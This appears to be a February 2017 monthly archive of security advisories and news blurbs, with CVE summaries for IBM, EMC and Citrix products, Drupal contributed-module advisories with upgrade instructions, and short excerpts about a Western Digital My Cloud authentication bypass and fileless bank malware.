IBM Rational DOORS Next Generation 5.0 and 6.0 discloses sensitive information in error response messages that could be used for further attacks against the system.
Monthly Archives: February 2017
CVE-2017-1127
IBM Rational DOORS Next Generation 4.0, 5.0 and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
CVE-2016-6032
IBM Rational Team Concert 4.0, 5.0 and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
OSF for Drupal – Less Critical – Cross Site Scripting (XSS) – SA-CONTRIB-2017-014
- Advisory ID: DRUPAL-SA-CONTRIB-2017-014
- Project: OSF for Drupal (third-party module)
- Version: 7.x
- Date: 2017-February-08
- Security risk: 5/25 ( Less Critical) AC:Basic/A:Admin/CI:None/II:None/E:Theoretical/TD:Uncommon
- Vulnerability: Cross Site Scripting
Description
This module enables administrators to use a user interface to create complex semantic queries that can be saved to be used in different locations of a Drupal instance that uses OSF.
CVE identifier(s) issued
- A CVE identifier will be requested, and added upon issuance, in accordance with Drupal Security Team processes.
Versions affected
- osf_querybuilder 7.x-3.3 versions prior to 7.x-3.3.
Drupal core is not affected. If you do not use the contributed OSF for Drupal module, there is nothing you need to do.
Solution
Install the latest version:
- If you use the OSF for Drupal module for Drupal 7.x, upgrade to OSF for Drupal 7.x-3.4
Also see the OSF for Drupal project page.
Reported by
Fixed by
- Frederick Giasson the module maintainer
Coordinated by
- Michael Hess of the Drupal Security Team
Contact and More Information
The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.
Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.
Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity
Drupal version:
Acquia Content Hub – Moderately Critical – Access Bypass – SA-CONTRIB-2017-013
- Advisory ID: DRUPAL-SA-CONTRIB-2017-013
- Project: Acquia Content Hub (third-party module)
- Version: 8.x
- Date: 2017-February-08
- Security risk: 13/25 ( Moderately Critical) AC:Basic/A:None/CI:Some/II:None/E:Theoretical/TD:All
- Vulnerability: Access bypass
Description
The Acquia Content Hub module enables the distribution and discovery of content from any source using the Acquia Content Hub service.
The module allows rendering of any arbitrary entity, without performing the appropriate access check. Users browsing to a well crafted URL could access information they may not be authorized to view.
CVE identifier(s) issued
- A CVE identifier will be requested, and added upon issuance, in accordance with Drupal Security Team processes.
Versions affected
- Acquia Content Hub 8.x-1.x versions prior to 8.x-1.4.
Drupal core is not affected. If you do not use the contributed Acquia Content Hub module, there is nothing you need to do.
Solution
Install the latest version:
- If you use the Acquia Content Hub module for Drupal 8.x, upgrade to Acquia Content Hub 8.x-1.4
Also see the Acquia Content Hub project page.
Reported by
Fixed by
- Alejandro Barrios the module maintainer
- Cash William of the Drupal Security Team
- Samuel Mortenson
- Kyle Browning
- Wim Leers
Coordinated by
- Stéphane Corlosquet of the Drupal Security Team
Contact and More Information
The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.
Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.
Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity
Drupal version:
Authentication bypass vulnerability in Western Digital My Cloud
Posted by Securify B.V. on Feb 08
————————————————————————
Authentication bypass vulnerability in Western Digital My Cloud
————————————————————————
Remco Vermeulen, Januari 2017
————————————————————————
Abstract
————————————————————————
It was discovered that Western Digital My Cloud is…
CVE-2017-2765
EMC Isilon InsightIQ 4.1.0, 4.0.1, 4.0.0, 3.2.2, 3.2.1, 3.2.0, 3.1.1, 3.1.0, 3.0.1, 3.0.0 is affected by an authentication bypass vulnerability that could potentially be exploited by attackers to compromise the affected system.
New “Fileless Malware†Targets Banks and Organizations Spotted in the Wild
More than a hundred banks and financial institutions across the world have been infected with a dangerous sophisticated, memory-based malware that’s almost undetectable, researchers warned.
Newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US,
Wetkit Omega – Moderately Critical – Access Bypass – SA-CONTRIB-2017-012
- Advisory ID: DRUPAL-SA-CONTRIB-2017-012
- Project: Web Experience Toolkit: Omega (third-party module)
- Version: 7.x
- Date: 2017-February-08
- Security risk: 10/25 ( Moderately Critical) AC:Basic/A:User/CI:Some/II:None/E:Proof/TD:Uncommon
- Vulnerability: Access bypass
Description
WetKit Omega 4.x is a modern, Sass and Compass enabled Drupal 7 theme powered by the Omega base theme.
When using the Drupal page cache, some links intended for privileged users can get cached and displayed to users who shouldn’t have access to them.
This is mitigated by the fact that the unprivileged users won’t be able to actually visit the links.
CVE identifier(s) issued
- A CVE identifier will be requested, and added upon issuance, in accordance with Drupal Security Team processes.
Versions affected
- wetkit_omega 7.x-1.x versions prior to 7.x-1.15.
Drupal core is not affected. If you do not use the contributed Web Experience Toolkit: Omega module, there is nothing you need to do.
Solution
Install the latest version:
- If you use the wetkit_omega module for Drupal 7.x, upgrade to wetkit_omega 7.x-1.15
Also see the Web Experience Toolkit: Omega project page.
Reported by
Fixed by
- William Hearn the module maintainer
Coordinated by
- Michael Hess of the Drupal Security Team
- David Snopek of the Drupal Security Team
Contact and More Information
The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.
Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.
Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity
Drupal version:
CVE-2017-5933
Citrix NetScaler ADC and NetScaler Gateway 10.5 before Build 65.11, 11.0 before Build 69.12/69.123, and 11.1 before Build 51.21 does not properly generate GCM nonces, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging a reused nonce in a session and a “forbidden attack,” a similar issue to CVE-2016-0270.